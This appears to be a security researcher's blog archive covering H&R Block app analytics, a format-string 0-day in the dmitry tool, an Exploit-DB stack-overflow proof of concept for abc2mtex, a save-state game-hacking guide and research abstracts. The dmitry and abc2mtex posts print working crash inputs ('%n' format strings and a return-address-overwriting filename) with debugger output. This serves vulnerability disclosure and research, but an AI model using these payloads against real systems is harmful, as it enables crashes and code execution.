    #     1) Some versions of the Android app prefix 'v' onto version

    if res['VERSION'][0] == 'v':
        res['VERSION'] = res['VERSION'][1:]

    assert len(res) == 6
    return res

def is_hrb(year, filter, line):
    """ Validate that a line should be parsed and added to the buckets.

    Specifically, entry should contain the right year, be a HRB user-agent,
    and contain the filter keyword if one was provided.
    """
    if line[:4] != year:
        return False
    if line[11:14] != 'HRB':
        return False
    if not filter is None and not filter in line:
        return False
    return True

if __name__ == '__main__':

    if len(sys.argv) < 3:
        print('Usage: %s <tax-year> [filter] <filepath>' % sys.argv[0])
        sys.exit(0)

    if len(sys.argv) == 3:
        filter = None
    else:
        filter = sys.argv[2]

    with open(sys.argv[-1], 'r') as ifile:
        data = [line.strip() for line in ifile if is_hrb(sys.argv[1], filter, line)]

    buckets = {
        'OS': {
            'IOS':     0,
            'ANDROID': 0,
        },
        'DEVICE': {
            'PHONE':   0,
            'TABLET':  0,
        },
        'APP': {
            'MYBLOCK': 0,
            'TAXES':   0,
        },
        'AUTH': {
            'TOUCHID': 0,
            'FACEID':  0,
            'N/A':     0,
        },
        'VERSION': {},
        'BROWSER': {},
    }

    for line in data:
        tokens = line.split(',')
        if len(tokens) != 3:
            print('WARNING: Cannot tokenize: %s' % line, file=sys.stderr)
            continue

        subtokens = parse_subtokens(tokens[1].split('-'))
        if subtokens is None:
            print('WARNING: Cannot subtokenize: %s' % tokens[1].split('-'), file=sys.stderr)
            continue

        try:
            count = int(tokens[-1])
        except ValueError:
            print('WARNING: Could not parse count from: %s' % line, file=sys.stderr)
            continue

        buckets['OS'][subtokens['OS']]         += count
        buckets['DEVICE'][subtokens['DEVICE']] += count
        buckets['APP'][subtokens['APP']]       += count
        buckets['AUTH'][subtokens['AUTH']]     += count

        if subtokens['VERSION'] in buckets['VERSION']:
            buckets['VERSION'][subtokens['VERSION']] += count
        else:
            buckets['VERSION'][subtokens['VERSION']] = count

        if subtokens['BROWSER'] in buckets['BROWSER']:
            buckets['BROWSER'][subtokens['BROWSER']] += count
        else:
            buckets['BROWSER'][subtokens['BROWSER']] = count

    print(json.dumps(buckets, indent=4))

I've been collecting this data since 2016 and I'm happy to share upon request.

Results

Here are the results for 2020, in no particular order:

From January 13 through April 14, 0 requests were made by MyBlock and 563,138 by Taxes.
545,368 requests were made from phones while 17,770 were tablets; about 97% of the requests were phones.
100% of requests were made by devices running iOS.
Seven versions of Taxes appear in the dataset: 9.2.0, 9.2.1, 9.3.0, 9.3.1, 9.4.0, 9.5.0, and 9.6.0.
0.2% of requests contain "Mozilla" in the user-agent.

And the security question from the original blog post:

221,827 requests used TouchID, 265,313 FaceID, and 75,998 showed neither keyword; 39%, 47%, and 14%, respectively.

Comparison to 2019

In 2019, the majority of requests were made by Taxes. Now in 2020, only Taxes appears in the data.
The change in usage of TouchID, FaceID, and neither is -20%, 21%, and -1%, respectively.

Discussion

I'm no longer seeing requests from Android devices or the MyBlock app, implying either something has been discontinued, or is no longer using the original custom user agents.

We've also reached the point where FaceID has finally overtaken TouchID. Here's a graphic capturing the change:

We'll see next year how the trends change. Thanks for reading!

Fuzzers Suck: New 0-Day Shows We Need To Do Better

2020-06-18T11:50:00-04:00

Fuzz testing (more commonly known as "fuzzing") has become a predominate technique for bug hunting because it's easy to deploy and yields results. Academic security research is now flooded with papers on the topic — USENIX Security alone accepted 7 papers in the 2020 Fall submission cycle — many of which propose incremental improvements that'll be obsolete by next year.

Meanwhile, plenty of serious bugs are slipping through our nets. Take a look at this 0-day my team found in a piece of software from 2016, which is readily available in major Linux distros like Debian, Ubuntu, and Kali:

:::text
$ ./dmitry "%p %p %p %p %p %p"

Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for %p %p %p %p %p %p
Continuing with limited modules
HostIP:
HostName:%p %p %p %p %p %p

Gathered Inic-whois information for 0x5598e89e9b47 (nil) (nil) 0x7ffc2f4878e0 0x7f721845de80 (nil)

[...]

This is a textbook example of an externally-controlled format string vulnerability (CWE-134), in a program that's trivial to fuzz, that others have already found vulnerabilities in. How did such a simple problem go unreported?

The problem is that fuzzing assumes vulnerabilities will easily trigger crashes. Unfortunately, this 0-day demonstrates an entire class of bugs where that isn't the case. If you know what you're looking for, it's trivial:

:::text
$ ./dmitry -w %n
Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for %n
Continuing with limited modules
HostIP:
HostName:%n

Segmentation fault

But for a fuzzer using typical mutation strategies, it's actually quite difficult:

:::text
                       american fuzzy lop 2.52b (wrapper)

┌─ process timing ─────────────────────────────────────┬─ overall results ─────┐
│        run time : 0 days, 0 hrs, 10 min, 32 sec      │  cycles done : 0      │
│   last new path : 0 days, 0 hrs, 0 min, 23 sec       │  total paths : 31     │
│ last uniq crash : 0 days, 0 hrs, 1 min, 12 sec       │ uniq crashes : 2      │
│  last uniq hang : 0 days, 0 hrs, 2 min, 56 sec       │   uniq hangs : 4      │
├─ cycle progress ────────────────────┬─ map coverage ─┴───────────────────────┤
│  now processing : 3 (9.68%)         │    map density : 0.08% / 0.24%         │
│ paths timed out : 0 (0.00%)         │ count coverage : 2.13 bits/tuple       │
├─ stage progress ────────────────────┼─ findings in depth ────────────────────┤
│  now trying : havoc                 │ favored paths : 13 (41.94%)            │
│ stage execs : 6540/24.6k (26.61%)   │  new edges on : 17 (54.84%)            │
│ total execs : 45.9k                 │ total crashes : 2 (2 unique)           │
│  exec speed : 585.4/sec             │  total tmouts : 14 (4 unique)          │
├─ fuzzing strategy yields ───────────┴───────────────┬─ path geometry ────────┤
│   bit flips : 0/152, 0/148, 1/140                   │    levels : 3          │
│  byte flips : 0/19, 0/15, 0/7                       │   pending : 28         │
│ arithmetics : 5/1062, 0/75, 0/0                     │  pend fav : 11         │
│  known ints : 1/96, 1/420, 0/308                    │ own finds : 30         │
│  dictionary : 0/0, 0/0, 0/0                         │  imported : n/a        │
│       havoc : 18/36.6k, 0/0                         │ stability : 76.28%     │
│        trim : 5.00%/4, 0.00%                        ├────────────────────────┘
└─────────────────────────────────────────────────────┘          [cpu001: 38%]

Side Note: For repeatability, this is the wrapper code I hacked together to restrict AFL to fuzzing a single command line argument:

:::c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv) {
    char *prog = "./dmitry";
    char *flag = "-w";
    char buf[1024];
    char *cmd[] = {prog, flag, buf, NULL};
    FILE *input;

    if (argc != 2)
        return 0;

    input = fopen(argv[1], "r");
    fgets(buf, sizeof(buf), input);
    fclose(input);

    execv(prog, cmd);

    return 0;
}

The crashes it did find pertain to CVE-2017-7938 — this program is also prone to stack overflows (oops). Also, because most fuzzers rely on stack traces to triage bugs, and these cases completely obliterate the stack, AFL can't tell that they're the same bug (double oops).

Okay, that last paragraph was a bit hostile, so allow me to take a few steps back. I'm not saying fuzzers are completely useless — I'm sure AFL could find the format string 0-day in a few hours — but I do think fuzzing is overrated. These tools rely on being very fast, at the cost of also being very dumb, and we're already seeing the diminishing returns, even as academia turns fuzzer optimization into an Olympic sport. I suspect these tools will never "become smart" because smart usually means slow, which is the antithesis of fuzzing. By calling attention to this trend (thank you for reading this far), I hope researchers will consider other avenues towards smart bug hunting, as opposed to just making fuzzing 5% faster, or adding better scaffolding to support kernels and other niche applications. Those tasks are useful in their own ways, but they leave trivial 0-days like this on the table.

To that end, I'm happy to report that the tool I've been working on for the past year, based on symbolic execution, is what actually led me to this 0-day, and it did so in a mere 16 seconds. I look forward to open sourcing the code, but I'm trying to get a paper published first and it's currently locked in a "major revision" cycle at a top tier security conference. With any luck, the release will be coming at the beginning of 2021. No one said research is fast.

Thanks for reading and happy hacking.

New CVE Published (CVE-2020-9549)

2020-03-02T09:30:00-05:00

CVE-2020-9549 has been assigned for a vulnerability I found in Pdfresurrect. The details are available here.

This issue is currently being patched.

New PoC Published to Exploit-DB (EDB-ID-47254)

2019-08-15T23:30:00-04:00

I published a PoC for a new vulnerability in abc2mtex version 1.6.1. This was discovered while testing an analysis framework I'm developing with my peers at Georgia Tech.

The vulnerability is due to an unsafe strcpy that allows an attacker to overwrite a return address and achieve arbitrary code execution. This is not the first time this program has been found to be susceptible to buffer overflows (CVE-2004-1257), but the novelty of this PoC is that exploitation is achieved using a long input filename whereas the previous CVE relied on providing maliciously crafted data.

Below is a copy of the PoC published to Exploit-DB:

Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
Date: 2019-08-13
Exploit Author: Carter Yagemann <yagemann@gatech.edu>
Vendor Homepage: https://abcnotation.com/abc2mtex/
Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
Version: 1.6.1
Tested on: Debian Buster

An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
address from the openIn function by providing a long input filename. This
carries similar risk to CVE-2004-1257.

Setup:

$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
$ tar -xzf abc2mtex1.6.1.tar.gz
$ make

$ gcc --version
gcc (Debian 8.3.0-6) 8.3.0
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

PoC:

$ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA

GDB:

We're going to place a breakpoint before and after abc.c:241 to show the overflow.

$ gdb -q ./abc2mtex
Reading symbols from ./abc2mtex...done.
(gdb) break abc.c:241
Breakpoint 1 at 0x4139: file abc.c, line 241.
(gdb) break abc.c:242
Breakpoint 2 at 0x414c: file abc.c, line 242.
(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA

Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
241                     (void) strcpy(savename,filename);
(gdb) bt
#0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
#1  0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273
(gdb) c
Continuing.

Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
242                     (void) strcat(filename,".abc");
(gdb) bt
#0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
#1  0x0000414243444546 in ?? ()
#2  0x00007fffffffe4f8 in ?? ()
#3  0x0000000200000000 in ?? ()
#4  0x0000000000000000 in ?? ()
(gdb) c
Continuing.
file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist

Program received signal SIGSEGV, Segmentation fault.
0x0000414243444546 in ?? ()
(gdb) quit

A Beginner's Guide to Hacking Video Game Save States (Fire Emblem 7 on the GBA)

2019-06-22T13:00:00-04:00

As a fun change of pace, I decided to write up a beginner's guide to hacking save states for video games. In this tutorial, we're going to take a look at Fire Emblem 7 for the Game Boy Advance (GBA). Specifically, we're going to hack the health bar of the final boss (spoilers!) to be 1 HP. In doing so, I'll cover the simplest practical reverse engineering technique for game hacking: differential analysis. I'll be using an emulator for Android called John GBA, so we'll also get into a few details about how it works.

Conceptually, this guide is very similar to the start of the tutorial provided by Cheat Engine. The main difference with this writeup is we're going to hack an actual video game by modifying an emulator's save state data rather than using a debugger on a running toybox program. Also, I'm going to perform all the steps using only standard GNU/Linux programs and a little bit of Python scripting. Thus, this guide is intended for readers familiar with basic programming and terminal CLI who may not have considered hacking a video game before and want a simple realistic example to get started.

Enjoy.

A Primer on Emulators & Save States

I'll start with a brief summary of what an emulator is. Put simply, it reads a program written for one computer architecture and executes it on another. In our case, the emulator I'm using can run games written for the GBA on an Android device. The most basic way of accomplishing this is using interpretation. Specifically, the emulator mimics the original architecture by allocating memory to represent RAM, CPU registers, etc. It then loads the program into the memory just as the emulated system would and steps through each instruction, modifying the memory accordingly. The collective data values contained in the emulated hardware at any given point is the emulation state.

Interpretation is the easiest form of emulation to implement, but slow because each hardware instruction on the original system is translated into one or more (often many) instructions on the emulator's hardware. To get around this, real emulators often compile and optimize the emulation logic "on-the-fly" using a technique called just-in-time (JIT) compilation. Optimizing emulators is an interesting topic for discussion, but beyond the scope of this guide.

What we do need to understand is save states. By pausing the emulation and storing all the data associated with the emulation state, the emulator can return to that state at any later time. All it has to do is read the saved state back into the memory representing the emulated hardware. This gives us a clean way to hack video games by intentionally corrupting save states. All we have to do is modify some data in the saved state and when the emulator loads it, it'll propagate our modifications into the emulated system:

But in order to do that, we first have to figure out the formatting of the emulator's saved states.

Reverse Engineering John GBA's Save State Format

Lucky for us, this emulator's save state formatting is fairly standard and we don't need to understand most of the details for our basic memory hack. First, we know the states have to be saved somewhere in storage. Turns out it's easy to find by just browsing: <internal_shared_storage>/Johnemulators/GBA/state. In this directory we find two file formats: .jg# and .js# where # is the slot number for the save (organizing saves as a linear list of slots is typical for video game emulators). It's easy to see which files we care about for Fire Emblem 7:

$ ls -l
total 301
-rw------- 1 carter carter 113059 Jun 22 02:31 Fire Emblem (U).jg0
-rw------- 1 carter carter 108703 Jun 22 04:24 Fire Emblem (U).jg1
-rw------- 1 carter carter  18502 Jun 22 02:31 Fire Emblem (U).js0
-rw------- 1 carter carter  67051 Jun 22 04:24 Fire Emblem (U).js1

A good first step towards figuring out their formats is to run file and see if there are any recognizable patterns:

$ file -i *
Fire Emblem (U).jg0: application/gzip; charset=binary
Fire Emblem (U).jg1: application/gzip; charset=binary
Fire Emblem (U).js0: image/jpeg; charset=binary
Fire Emblem (U).js1: image/jpeg; charset=binary

Much to our luck, despite the custom file extensions, each save state is actually just a JPEG image and a compressed data file. We don't need to worry about the images, so let's focus on the data files. First, copy them off the Android device into a local directory. Also, make sure to save a backup copy somewhere safe so you won't lose your data if you make a mistake! Next, let's decompress one of them:

# gzip expects compressed files to have the .gz extension,
# so we have to rename it first
mv Fire\ Emblem\ \(U\).jg1 1.gz
gzip -d 1.gz
# after decompressing, gzip will automatically strip the extension
# from the filename

And take a look at the beginning of the data:

$ hexdump -C 1 | head
00000000  0a 00 00 00 46 49 52 45  45 4d 42 4c 45 4d 45 00  |....FIREEMBLEME.|
00000010  41 45 37 45 00 00 00 00  00 00 00 00 01 00 00 00  |AE7E............|
00000020  00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 d8 7d 00 03  00 00 00 00 00 00 00 00  |.....}..........|
00000040  00 00 00 00 1f 00 00 00  00 00 00 04 a0 7f 00 03  |................|
00000050  14 02 00 00 1c 00 00 00  12 00 00 60 1f 00 00 60  |...........`...`|
00000060  a0 7f 00 03 14 02 00 00  1f 00 00 60 00 00 00 00  |...........`....|
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000080  c0 7d 00 03 0c 02 00 00  d0 7f 00 03 70 fa 0b 08  |.}..........p...|
00000090  3f 00 00 60 00 00 00 00  00 00 00 00 00 00 00 00  |?..`............|

Another lucky break for us. We can see the canonical name for the game (FIREEMBLEM) at the beginning of the data. In fact, if we search the game's ROM (the program as it's stored when it isn't running), we'll see the same name near it's beginning too:

$ hexdump -C Fire\ Emblem\ \(U\).gba | grep -A 10 "FIREEMBLEM"
000000a0  46 49 52 45 45 4d 42 4c  45 4d 45 00 41 45 37 45  |FIREEMBLEME.AE7E|
000000b0  30 31 96 00 00 00 00 00  00 00 00 00 00 d1 00 00  |01..............|
000000c0  12 00 a0 e3 00 f0 29 e1  28 d0 9f e5 1f 00 a0 e3  |......).(.......|
000000d0  00 f0 29 e1 18 d0 9f e5  3c 11 9f e5 18 00 8f e2  |..).....<.......|
000000e0  00 00 81 e5 34 11 9f e5  0f e0 a0 e1 11 ff 2f e1  |....4........./.|
000000f0  f2 ff ff ea 00 7e 00 03  a0 7f 00 03 01 33 a0 e3  |.....~.......3..|
00000100  02 3c 83 e2 00 20 93 e5  02 18 a0 e1 21 18 a0 e1  |.<... ......!...|
00000110  00 00 4f e1 0b 40 2d e9  22 18 02 e0 02 0a 11 e2  |..O..@-.".......|
00000120  fe ff ff 1a 00 20 a0 e3  01 00 11 e2 26 00 00 1a  |..... ......&...|
00000130  04 20 82 e2 02 00 11 e2  23 00 00 1a 04 20 82 e2  |. ......#.... ..|
00000140  04 00 11 e2 20 00 00 1a  04 20 82 e2 08 00 11 e2  |.... .... ......|

We now know that after decompressing, the data file contains the plain bytes of the game's memory. Next, we have to figure out which bytes to overwrite in this 723 KB file.

Differential Analysis

The simplest reverse engineering technique for finding a data variable of interest is differential analysis. Remember that our goal is to modify the health of the final boss for an easy victory. It's reasonable to assume that somewhere in the program's memory, there's an integer that keeps track of of the current health. Also, since the game is actively running, this variable shouldn't be relocated in memory too often. The question is: how do we find it?

We'll use differential analysis. Specifically, we'll save the game's state, inflict some damage on the boss, save the new state, inflict more damage, save and so forth. Since this game shows the HP value and the damage of our attacks, we should know the exact health of the boss at each state we save. All we need to do then is compare the memory of the states and find a location that contains the correct health value across all the states.

Creating Save States

So let's begin. It's time to confront the big bad dragon at the end of Fire Emblem 7:

This overgrown lizard is quite the challenge if you approach him under leveled and without enough good equipment, but rather than working harder by reloading a past save and redoing half the chapters, we're going to work smarter and show the boss who the real master of this game universe is!

At our first save state, he's at full health. Unfortunately, this game is cheeky and hides his HP at the start of the fight:

This won't be a problem though because the game shows exactly how much damage we inflict:

In this case, Eliwood's sword will inflict 21 damage. He's seriously under powered, but can still survive the attack:

At this point, we make our second save state and note that we've inflicted 21 damage so far. As Athos prepares to cast magic on the foul beast, we can now see the HP of the boss:

He had 99 HP when the second save was made, meaning he started with 120. Now Athos inflicts another 20 damage:

And we make a third save state. The HP of the boss at this save is 79:

Three states should be enough for our analysis, so it's time to transfer the data over to a computer and get hacking.

The Analysis

As I mentioned earlier, this is a differential analysis. We're looking for a memory location storing a variable that's 120 in the first state, 99 in the second and 79 in the third. In base 16, this is 0x78, 0x63 and 0x4f. Luckily, all these values are small enough to be encoded as a single byte, so we can scan the game's memory linearly without having to consider factors like alignment or endianness. So let's get to work.

To speed up this analysis, I wrote a script in Python. This code is compatible with Python 2 and 3 and the comments are self-explanatory:

:::python
#!/usr/bin/env python
from __future__ import print_function
import gzip
from struct import unpack
import sys

def decode_gzip(filepath):
    # Python 2 and 3 decode byte I/O differently, this method ensures consistency
    with gzip.open(filepath, 'rb') as fd:
        if sys.version_info.major <= 2:
            return [unpack('B', byte)[0] for byte in fd.read()]
        else:
            return fd.read()

# the names for my save state data files
files = ['Fire Emblem (U).jg1',
         'Fire Emblem (U).jg2',
         'Fire Emblem (U).jg3']

# the expected HP value in each save state
hps = [120, 99, 79]

# decompress the save states
data = [decode_gzip(file) for file in files]

# for each save state, find all the offsets that contain the expected HP value
# this is not the most efficient way of doing intersection search, but it's easier
# to read and efficient enough for our amount of data
match_sets = list()
for state, hp in zip(data, hps):
    matches = [offset for offset, byte in enumerate(state) if byte == hp]
    match_sets.append(set(matches))

# we want the intersecting offsets across save states
intersection = match_sets[0].intersection(*match_sets[1:])

# sort and print the results
offsets = [hex(offset) for offset in sorted(list(intersection))]
print(' '.join(offsets))

Running the search on my states yields three candidate locations:

$ python search.py
0x29222, 0x354b2, 0x91df3

It's common to get more than one candidate because depending on the game's logic, values like health might be maintained in multiple locations for different purposes (e.g. for rendering it as text on the screen, detecting certain state triggers, etc.). As long as the number of results is few, it's usually safe to just overwrite all of them. If the game crashes, we can always go back and make modifications more conservatively.

Modifying a Save State

Now that we know where to make our modifications, let's set the health of the boss to 1 HP! Here's another Python script to do just that:

:::python
#!/usr/bin/env python
from __future__ import print_function
import gzip
from struct import unpack
import sys

def decode_gzip(filepath):
    # Python 2 and 3 decode byte I/O differently, this method ensures consistency
    with gzip.open(filepath, 'rb') as fd:
        if sys.version_info.major <= 2:
            return bytearray([unpack('B', byte)[0] for byte in fd.read()])
        else:
            return bytearray(fd.read())

if len(sys.argv) < 4:
    print("Usage:", sys.argv[0], "<state_file.jq> <patch_value> [<offsets> ...]")
    sys.exit(1)

# parse the command line arguments
state_file = sys.argv[1]
patch_value = int(sys.argv[2], 16)
offsets = [int(value, 16) for value in sys.argv[3:]]

# read in the save state data
data = decode_gzip(state_file)

# overwrite the designated bytes
for offset in offsets:
    data[offset] = patch_value

# write the new save state
with gzip.open(state_file + '.patched', 'wb') as fd:
    fd.write(bytes(data))

Now we just apply the patch:

$ python patch.py Fire\ Emblem\ \(U\).jg1 0x01 0x29222 0x354b2 0x91df3

Which will create a new save state with the filename of the original plus the suffix .patched. All that's left is to replace the original save state in John GBA with our patched version and then we're ready to slay a dragon with ease.

The Result

Not so tough now, are we dragon?

And down it goes in one hit. How embarrassing:

Conclusion

So that's the most basic approach to hacking a video game save state. I hope you've found this guide entertaining and informative. I'd like to reemphasize that this only scratches the surface of the broad area that is reverse engineering. The beauty of differential analysis is we didn't have to know any low-level details about how the Game Boy Advance hardware behaves or the game's logic. This makes differential analysis one of the most transferable techniques. That said, it also has limited applicability. For example, if the game developers wanted to prevent tampering, even the most basic obfuscation (e.g. doubling every integer before storing it in memory) would thwart our analysis. There are also fun hacks that cannot be implemented via a one-time memory patch (e.g. giving your character invincibility). So if you find this topic interesting, I recommend checking out other tutorials floating around on the internet.

Thanks for reading and happy hacking.

MLSploit Extended Abstract to Appear in KDD 2019

2019-06-11T09:30:00-04:00

My coauthors and I will be presenting an extended abstract in the 25th Conference on Knowledge Discovery and Data Mining (KDD'19) in August. Below is a preview:

Title: MLsploit: A Framework for Interactive Experimentation with Adversarial Machine Learning Research

Authors: Nilaksh Das, Siwei Li, Chanil Jeon, Jinho Jung, Shang-Tse Chen, Carter Yagemann, Evan Downing, Haekyu Park, Evan Yang, Li Chen, Michael Kounavis, Ravi Sahita, David Durham, Scott Buck, Polo Chau, Taesoo Kim, Wenke Lee

Abstract: We present MLsploit, the first user-friendly, cloud-based system that enables researchers and practitioners to rapidly evaluate and compare state-of-the-art adversarial attacks and defenses for machine learning (ML) models. As recent advances in adversarial ML have revealed that many ML techniques are highly vulnerable to adversarial attacks, MLsploit meets the urgent need for practical tools that facilitate interactive security testing of ML models. MLsploit is jointly developed by researchers at Georgia Tech and Intel, and is open-source. Designed for extensibility, MLsploit accelerates the study and development of secure ML systems for safety-critical applications. In this showcase demonstration, we highlight the versatility of MLsploit in performing fast-paced experimentation with adversarial ML research that spans a diverse set of modalities, such as bypassing Android and Linux malware, or attacking and defending deep learning models for image classification. We invite the audience to perform experiments interactively in real time by varying different parameters of the experiments or using their own samples, and finally compare and evaluate the effects of such changes on the performance of the ML models through an intuitive user interface, all without writing any code.

Barnum Paper to Appear in Information Security Conference 2019 (ISC'19)

2019-06-08T15:30:00-04:00

My coauthors and I will be presenting a paper in the 22nd Information Security Conference (ISC'19) in September. Below is a preview:

Project Page

Title: Barnum: Detecting Document Malware via Control Flow Anomalies in Hardware Traces.

Authors: Carter Yagemann (Georgia Tech), Salmin Sultana (Intel Labs), Li Chen (Intel Labs), Wenke Lee (Georgia Tech).

Abstract: This paper proposes Barnum, an offline control flow attack detection system that applies deep learning on hardware execution traces to model a program's behavior and detect control flow anomalies. Our implementation analyzes document readers to detect exploits and ABI abuse. Recent work has proposed using deep learning based control flow classification to build more robust and scalable detection systems. These proposals, however, were not evaluated against different kinds of control flow attacks, programs, and adversarial perturbations.

We investigate anomaly detection approaches to improve the security coverage and scalability of control flow attack detection. Barnum is an end-to-end system consisting of three major components: 1) trace collection, 2) behavior modeling, and 3) anomaly detection via binary classification. It utilizes Intel^® Processor Trace for low overhead execution tracing and applies deep learning on the basic block sequences reconstructed from the trace to train a normal program behavior model. Based on the path prediction accuracy of the model, Barnum then determines a decision boundary to classify benign vs. malicious executions.

We evaluate against 8 families of attacks to Adobe Acrobat Reader and 9 to Microsoft Word on Windows 7. Both readers are complex programs with over 50 dynamically linked libraries, just-in-time compiled code and frequent network I/O. Barnum shows its effectiveness with 0% false positive and 2.4% false negative on a dataset of 1,250 benign and 1,639 malicious PDFs. Barnum is robust against evasion techniques as it successfully detects 500 adversarially perturbed PDFs.

Extended Abstract to Appear in CVPR-19 Workshop on Explainable AI

2019-04-26T17:00:00-04:00

My coauthors and I will be presenting an extended abstract in the workshop on Explainable AI at CVPR 2019 in June. Below is a preview:

Title: To believe or not to believe: Validating explanation fidelity for dynamic malware analysis.

Authors: Li Chen (Intel Labs), Carter Yagemann (Georgia Tech), Evan Downing (Georgia Tech).

Abstract: Converting malware into images followed by vision-based deep learning algorithms has shown superior threat detection efficacy compared with classical machine learning algorithms. When malware are visualized as images, visual-based interpretation schemes can also be applied to extract insights of why individual samples are classified as malicious. In this work, via two case studies of dynamic malware classification, we extend the local interpretable model-agnostic explanation algorithm to explain image-based dynamic malware classification and examine the interpretation fidelity. For both case studies, we first train deep learning models via transfer learning on malware images, demonstrate high classification effectiveness, apply an explanation method on the images, and correlate the results back to the samples to validate whether the algorithmic insights are consistent with security domain expertise. In our first case study, the interpretation framework identifies indirect calls that uniquely characterize the underlying exploit behavior of a malware family. In our second case study, the interpretation framework extracts insightful information such as cryptography-related APIs when applied on images created from API existence, but generate ambiguous interpretation on images created from API sequences and frequencies. Our findings indicate that current image-based interpretation techniques are promising for vision-based malware classification. We continue to develop image-based interpretation schemes specifically for security applications.

H&R Block App Analytics for 2019

2019-04-12T13:00:00-04:00

Last year I wrote a blog post about using the analytics publicly released by the USA government to gleam some information about H&R Block's mobile apps. If you haven't read it, I recommend doing so because in this post I'm going to give an update for the 2019 tax year.

I haven't changed the code or data source, so check the original blog post for those and as I previously mentioned, I've been collecting this data since 2016 and I'm happy to share upon request.

Results

Here are the results for 2019, in no particular order:

From January 13 through April 11, 497 requests were made by MyBlock and 334,960 by Taxes.
322,749 requests were made from phones while 12,708 were tablets; about 96% of the requests were phones.
100% of requests were made by devices running iOS.
Three versions of MyBlock appear in the dataset: 6.6.0, 6.8.0, and 7.0.1.
Seven versions of Taxes appear in the dataset: 7.7.1, 7.8.0, 8.1.0, 8.2.0, 8.3.0, 8.5.0, and 8.6.0.
100% of requests contain "Mozilla" in the user-agent.

And the security question from the original blog post:

197,548 requests used TouchID, 88,094 FaceID, and 49,815 showed neither keyword; 59%, 26%, and 15%, respectively.

Comparison to 2018

Whereas in 2018 the vast majority of requests were made by MyBlock, in 2019 almost all requests were made by Taxes.
No requests by Android devices appear in 2019.
The change in usage of TouchID, FaceID, and neither is -15%, 19%, and -4%, respectively.

Discussion

It's interesting that no requests were made from Android devices in 2019. The MyBlock app is listed on the Play store, so why don't they appear in the data? One possibility is they no longer use a special user agent. Another is they no longer communicate with a USA government website contained in the public analytic data. It's hard to know for certain what the root cause is.

We can also see that the usage of FaceID is rising at a cost to both of the other categories. This implies conversions came from both existing TouchID users and new adopters. The shift makes sense as more FaceID compatible phones reach customer hands. It'll be interesting to see if this trend continues in 2020 or if the adoption of Apple's biometric features reaches premature saturation.

Android Intent Firewall Documentation

2019-04-06T10:00:00-04:00

Awhile ago I was notified that the documentation on Android's Intent Firewall that I wrote while I was a student at Syracuse University is no longer available. Surprisingly, despite how old the document is, I still get requests for it. Thus, I've taken the time to make a copy of it on this website for preservation. You can access it here.

Malware Has a Color

2019-02-21T21:00:00-05:00

In an upcoming paper I plan to present some preliminary work in applying machine learning to program control flows to detect anomalies. Specifically, my coauthors and I demonstrate how to use this to analyze document malware with promising accuracy. In previous posts, I've detailed the threat malicious documents pose to users and shared some insights into why this problem remains prevalent. For this post, I want to switch gears and share a fun technique I use to help understand what the control flow anomaly detector is really seeing. Put playfully, I'm going to demonstrate how to spot malware by the color it makes. Enjoy.

Without going into too many details about the system (I'll be sure to make a post about where to find the paper and code when it becomes available), at a high level we collect and use execution traces of a target program (e.g. Acrobat Reader) opening benign documents to create a path prediction model. We then use the model on an unlabeled trace with the intuition being that any occurring anomalies will cause a sudden drop in prediction accuracy. There's a little more to it than that, but this is the gist of how the system operates.

One challenge with such a system is the traces are massive. Even if we narrow our focus to only indirect control flow transfers (e.g. ret, icall, and ijmp), that's still thousands to millions of events per minute of real time execution. This makes diagnosing whether there was a bug or whether the malware simply didn't detonate a challenge.

One option is to manually analyze the malware sample, typically by running the virtual machine in another framework. This is time consuming though, which is why I've come up with a niftier solution that involves visualizing the trace in conjunction with the model's output. This is how I discovered that malware has a color.

Visualization Technique

First, I convert each target address into a color by hashing it. For simplicity, I take the first three bytes of a md5 hash to get a RGB tuple. The reason I use a secure hashing algorithm instead of a simple checksum is so nearby addresses will create very different colors, creating contrast. Here's an example of what a benign trace looks like:

We can clearly see patterns, but there's no clear indicator of what makes one normal and another anomalous. Let's compare with a family of PDF malware that the system is good at detecting: pdfka. Here's one of the traces:

Look at that streak of dark blue! What's going on there? Is this an exploit or simply a pattern our previous example didn't capture? To find out, I create a second image where each target is a white pixel if the model predicted it correctly and black if the prediction was wrong. Here's the result for the same trace:

